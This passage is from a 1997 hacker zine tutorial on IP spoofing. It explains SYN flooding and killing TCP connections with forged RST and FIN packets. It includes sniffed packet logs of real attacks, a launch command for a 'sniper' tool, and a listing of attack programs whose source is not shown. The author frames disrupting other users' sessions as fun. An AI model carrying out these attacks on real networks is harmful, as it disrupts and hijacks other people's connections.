???????????????????????????????????????????????????????????????????????????????
The latest news is that the 2600 printers have gone bust, and taken $9000 of
the 2600's money with them, Winter edition of 2600 might not come out.
emmilio can't be very happy can he?
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
.:. The CodeZero In Assosiation With Dr_Sp00f Presents .:.
.:. A Confidence Remains High Production .:.
???????????????????????????????????????????????????????????????????????????????
-=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=-
-=[ Part of Dr_sp00f's Packet Project']=-
(Includes Source for Linux 1.3.X and later kernels)
All text and Source code written by Dr_Sp00f himself (Copyright 1997)
All source tested on Linux kernel 2.0.X
All packet data captured with Sniffit 0.3.2 (a pre-release at that time)
???????????????????????????????????????????????????????????????????????????????
PART I: Simple spoofing (Non blind)
-----------------------------------
0. Introduction
0.1 What
0.2 For whom
0.3 Disclaimer
0.4 Licence
1. Short explanation of some words
2. Description of sourcecode
2.1 Source included
2.2 Programmer notes
3. TCP/IP (UDP) in an hazelnutshell
4. Non-blind spoofing
4.1 Know what you are doing
4.2 SYN flooding
4.3 Connection Killing
4.3.1 Using reset (RST)
4.3.2 Closing a connection (FIN)
4.3.3 Improving
4.4 Connection Hijacking
4.5 Other
5. The source code
???????????????????????????????????????????????????????????????????????????????
PART I: Simple spoofing (Non blind)
???????????????????????????????????????????????????????????????????????????????
0. Introduction
---------------
0.1 What
--------
This document describes some IP spoofing attacks and gives you example
source code of the programs used for these attacks (and packet sniffer
logs, so you see what exactly happens).
It also provides you with an easy to use include file for experimenting a
little yourself.
Oh, if you make something nice with the "spoofit.h" file, please mail it to me
(or a reference where it is available) with a little explanation on what it
is (a few lines are enough)...
If you have interesting remarks, comment, idea's, ... please contact me
Dr_spoof@geocities.com
If YOU think of yourself, you are "3><Tr3/\/\3lY 3Le3T", please don't bother
contacting me.
Flames >/dev/null or >/dev/echo depends on how smart you are.
It is not wise to use what you don't know/understand, so read this before
trying anything... it will only take a few minutes, and probably save you
some hours of failure...
This code is not crippled in the usual way (removing some vital parts),
the power is limited by it's briefness, because I wanted to keep
everything simple and illustrative (but working). It's a simple job to
improve it, and that is the goal of this doc, that you improve it yourself.
Special thx to |ExcEEd| and theJUdgE also to all those ppl who deserve
it.
0.2 For whom
------------
For people with an elementary knowledge of TCP/IP, some knowledge on C (only
the basic setup) and some general UNIX knowledge.
It's no use reading this document if you are completely unaware of these
things, but mind you, only a little knowledge is enough.
0.3 Disclaimer
--------------
I am in no way responsible for the use of this code. By using this
software and reading this document you accept the fact that any damage
(emotional, physical, dataloss and the end of the world as we know it ...)
caused by the use or storage of these programs/documents is not MY
responsability.
I state that during the writing and testing of this document/source, I
never violated any law. All spoofing was done between machines where I had
legit root access, or where I had the permission from the legit root.
This code can be written by any competent programmer, so this source is
not so harmfull as some will say (cauz' I'm sure some people won't like
this degree of disclosure).
0.4 Licence
-----------
All source code and text is freely available. You can spread it, as long
as you don't charge for it (exceptions are a small reproduction fee, if
it isn't spread together with commercial software, texts.)
You may not spread parts of the document, it should be spread as one
package. You may not modify the text and/or source code.
You can use the spoofit.h or derived code in your own programs as long as
they are not commercial (i.e. FREE), and you give me the credits for it.
1. Short explanation of some words
----------------------------------
This is a short explanation of some words you might see in the
text/source. You probably know all this, but I put it in here anyway.
Sniffit
My favourite Packet Sniffer, all sniffed sequences in this
(At time of writing a pre-release 0.3.2)
IP-spoofing (further referenced to as spoofing)
The forging of IP packets
NOTE that not only IP based protocols are spoofed.
NOTE that spoofing is also used on a constructive base (LAN spoofing,
not discussed here).
NOTE that I don't use it on a constructive base ;)
Non-blind spoofing
Using the spoofing to interfer with a connection that sends packets
along your subnet (so generally one of the 2 hosts involved is located
on your subnet, or all data traffic has to be passing your network
device,... you might consider taking a job at some transatlantic route
provider).
Blind spoofing
Using the spoofing to interfer with a connection (or creating one),
that does not send packets along your cable.
2. Description of sourcecode
----------------------------
2.1 Source included
-------------------
spoofit.h
The include file that provides some easy to use spoofing functions.
To understand the include file and it's functions, read the header of
that file for use of the C functions.
*.c
Example programs (on the use of spoofit.h) that are discussed in this
document.
Details on these programs are included in the appropriate sections.
sniper-rst.c
Basic TCP connection killer.
(denial-of-services)
sniper-fin.c
Basic TCP connection killer.
(denial-of-services)
hijack.c
Simple automated telnet connection hijacker.
2.2 Programmer notes
--------------------
These programs are just examples. That means, they could be improved a
lot. Because I wanted to keep them short and leave some stuff to your
imagination, they are very simple.
However they all work and are a good starting point.
3. TCP/IP (UDP) in an hazelnutshell
-----------------------------------
Because it has been explained enough in 'Phrack Volume Seven, Issue
Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of
documentation available on the subject I will only repeat some things
very briefly. (Please read the phrack #48 file or any other document on
the subject before reading this).
A connection is fully defined with 4 parameters, a source host and port,
and a destination host and port.
When you make a connection, data is send in packets. Packets take care of
low level trafic, and make sure the data arrives (sometimes with special
error handling). The spine of most networks is the IP protocol version 4.
It is totally independent of all hardware protocols.
TCP and UDP are higher level protocols wrapped up in IP packets.
All those packets consist of a header and data.
IP header contains (amongst other things): IP of source and destination
hosts for that packet, and the protocol type of the packet wrapped up in
it. (TCP=6, UDP=17, etc.).
UDP packets contain (amongst other things): port number of source and
destination host. UDP has no such thing as SEQ/ACK, it is a very weak
protocol.
TCP packets contain (amongst other things): port number of source and
destination host, sequence and acknowledge numbers (further refered to as
SEQ/ACK), and a bunch of flags.
SEQ number: is counted byte per byte, and gives you the number of the
NEXT byte to be send, or that is send in this packet.
ACK number: is the SEQ number that is expected from the other host.
SEQ numbers are chosen at connection initiation.
I said is was going to be short... If you didn't understand the above
text, read up on it first, because you won't understand sh!t of the rest.
4. Non-blind spoofing
---------------------
4.1 Know what you are doing
---------------------------
The concept of non-blind spoofing (NBS further in this doc) is pretty
simple. Because packets travel within your reach, you can get the current
sequence and acknowledge (SEQ/ACK further in this doc) numbers on the
connection.
NBS is thus a very easy and accurate method of attack, but limited to
connections going over your subnet.
In spoofing documentation these attacks are sometimes ommited, because
they are mostly 'denial-of-service' attacks, or because people don't
realise the advantage a spoof (in particulary a hijack) can have above
simple password sniffing.
Spoofing in generally is refered to as a verry high level of attack. This
refers to blind spoofing (BlS further in this doc), because NBS is
kidstuff for a competent coder.
4.2 SYN flooding
----------------
Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of
18'. I won't waste much time on it.
Setup:
host A <-----][----------X--------------->host B
|
host S <-----------------/
Concept:
Host S impersonates SYN (connection init) coming from host A, to host B.
Host A should be unreachable (e.g. turned off, non existant,...).
B sends out the second packet of the 3 way TCP handshake. Host B will now
wait for response of host A.
If host A is reachable it will tell host B (with a reset: RST) that it DID NOT
inititate a connection, and thus host B received a bogus packet. (In that case
host B will ingnore the SYN, and *normally* nothing will happen)
So if A is unreachable, B will wait for response some time.
When doing multiple attacks, the backlog of host B is going to be exceeded
and host B will not except new connections (read on TCP bugs for
additional features ;) for some time.
4.3 Connection Killing
----------------------
Setup:
host A <------X------------------------->host B
| A,B have a TCP connection running
host S <------/ A,S on same subnet
(setup is the same in both cases)
Use:
Clearing mudders of your net, annoying that dude typing an important
paper, etc... plain fun.
4.3.1 Using reset (RST)
-----------------------
Concept:
TCP packets have flags which indicate the status of the packet, like RST.
That is a flag used to reset a connection. To be accepted, only the
sequence number has to be correct (there is no ACK in a RST packet).
So we are going to wait for packets in a connection between A and B.
Assume we wait for packets to A. We will calculate (from B's packets)
the sequence number for A's packets (from B's ACK's), and fire a bogus RST
packet from S (faking to be A) to B.
An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
host A : 166.66.66.1
host B : 111.11.11.11
(S on same subnet as A)
(This is a good example of how things not always go as you want, see
below for a solution)
1) connection running...
we wait for a packet to get current SEQ/ACK (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A6 ACK (hex): B8BD7679
FLAGS: -AP--- Window: 3400
(data removed because irrelevant, 2 bytes data)
2) This is the ACK of it + included data (witch causes SEQ number to
change, and thus messing up our scheme, because this came very fast.)
(B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7679 ACK (hex): 57E1F2A8
FLAGS: -AP--- Window: 2238
(data removed because irrelevant, 2 bytes data)
3) ACK of it. (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A8 ACK (hex): B8BD767B
FLAGS: -A---- Window: 3400
(data removed because irrelevant)
4) further data (B->A)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD767B ACK (hex): 57E1F2A8
FLAGS: -AP--- Window: 2238
(data removed because irrelevant)
5) ACK of it (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
SEQ (hex): 57E1F2A8 ACK (hex): B8BD7691
FLAGS: -A---- Window: 3400
6) Now we get 2 RST packets. How do you explain that? Well, the first reset
packet has been buffered somewhere on our system, because the ethernet
segment was busy when we wanted to send it. This is the 'unexpected
thing' I discussed above, here we are lucky, the data stream cooled down
so fast.
When it doesn't cool down so fast, we could miss our RST (or the
connection will be killed a little later then when we wanted), you'll see
some idea's on how to fix that problem.
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7679 FLAGS: ---R--
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
SEQ (hex): B8BD7691 FLAGS: ---R--
(This was the packet that killed the connection)
Discussion of the program:
The discussion here is a bit weird , that is because 'sniper-rst.c' is
not designed to be an optimal killer, merly to be an example.
We have the problem of speed here. We miss some packets what causes those
resends. So we would design a better 'sniper' if we do the following:
- use blocking IO (not necessarilly, because the RST killer would
loose some of it's beauty (looping), this is dealt
with in the FIN killer example. Blocking is a
little faster when a lot of packets come after
each other.)
- multi-packet firing... fire more packets with incremented SEQ.
(this is commented in the source)
- waiting for a pure ACK packet (no data), because otherwise you
risk to much of getting mid transmission and not being fast enough.
(disadvantage is the 'waiting period' before the connection is
killed)
NOTE these examples were done on non-loaded networks, with non-loaded
servers, what makes it a worst case scenario for speed problems.
4.3.2 Closing a connection (FIN)
--------------------------------
Concept:
An other flag is FIN and says: "no more data from sender".
This flag is used when closing a connection down the normal legit way. So
if there was a way to make a packet that is accepted by one of the two
hosts, this host would believe the 'sender' didn't have any data left.
Following (real) packets would be ignored as they are considered bogus.
That's it, because we can sniff the current SEQ/ACK of the connection we
can pretend to be either host A or B, and provide the other host with
CORRECT packetinformation, and an evil FIN flag.
The beauty of it all is, that after a FIN is send the other host always
replies with one if it is accepted, so we have a way to verify our
killing, and can be 100% sure of success (if for some reason we missed a
SEQ or ACK, we can just resend).
RST killing is more popular and is prefered, but I've put this in as an
example, and I like it myself.
An actual attack:
(These are real sniffed packets, although IP numbers of hosts were changed)
host A : 166.66.66.1
host B : 111.11.11.11
(S on same subnet as A)
1) connection is running....
sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072'
and waits for a packet to take action (we need to get SEQ/ACK)
(mind you switching host A and B would be the same, only S would be
impersonating A instead of B)
suddenly a packet arrives... (A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B98B ACK (hex): 69C5473E
FLAGS: -AP--- Window: 3400
Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3
9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E >
50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A .
~~~~~~~~~ > 2 data bytes
2) sniper detected it, and sends a bogus packet. (S as B -> A)
We calculate our SEQ as: ACK of (A->B) packet
We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet
(19C6B98B + 2 = 19C6B98D)
(so we tell A, we received the last packet, and will not transmit
further data)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
SEQ (hex): 69C5473E ACK (hex): 19C6B98D
FLAGS: -A---F Window: 7C00
(data removed because irrelevant)
3) host A now says: 'okay, you end the session, so here is my last data'
(A->B)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B98D ACK (hex): 69C5473E
FLAGS: -AP--- Window: 3400
(data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B998 ACK (hex): 69C5473F
FLAGS: -A---- Window: 3400
(data removed because irrelevant)
4) host A now has flushed its buffer and on his turn FIN's the connection.
(A->B)
sniper, intercepts this packet and now knows the hosts fell for the
spoof and the killing was a success!
(host A will no longer accept any data)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
SEQ (hex): 19C6B998 ACK (hex): 69C5473F
FLAGS: - |
